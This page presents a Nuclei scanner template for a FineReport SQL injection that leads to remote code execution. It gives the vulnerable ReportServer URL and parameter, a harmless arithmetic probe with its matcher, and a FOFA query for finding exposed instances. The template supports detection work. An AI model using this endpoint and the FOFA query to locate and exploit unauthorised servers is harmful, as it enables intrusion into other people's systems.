Skip to content

FineReport SQLi - Remote Code Execution

ID: finereport-sqli-rce

Severity: critical

Author: adeljck

Tags: finereport,rce,sqli

Access URL:/webroot/decision/view/ReportServer?test=&n=, which can execute the SQL statement in GET parameter n. This vulnerability is caused by Fanruan’s own sqlite-jdbc-x.x.x.x.jar driver.

id: finereport-sqli-rce
info:
name: FineReport SQLi - Remote Code Execution
author: adeljck
severity: critical
description: |
Access URL:/webroot/decision/view/ReportServer?test=&n=, which can execute the SQL statement in GET parameter n. This vulnerability is caused by Fanruan's own sqlite-jdbc-x.x.x.x.jar driver.
reference:
- https://github.com/wy876/POC/blob/main/%E5%B8%86%E8%BD%AF%E7%B3%BB%E7%BB%9FReportServer%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E5%AF%BC%E8%87%B4RCE.md
metadata:
max-request: 1
verified: true
fofa-query: app="帆软-FineReport"
tags: finereport,rce,sqli
variables:
string: '{{rand_base(8, "abc")}}'
http:
- raw:
- |
GET /webroot/decision/view/ReportServer?{{string}}=&n=${sum(1024,123)} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
part: location
words:
- 'report?{{string}}&n=1147'
- type: status
status:
- 200
- 302
# digest: 4a0a00473045022100deb66c02a0c0ca80c8f929589a0409f3db495b8da7393fbaf53fb4ed7989894d022018d71f2eabf13f4d162cfde09c1dddbc115ec397c26b77e7384ada6b1474327c:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/finereport/finereport-sqli-rce.yaml"

View on Github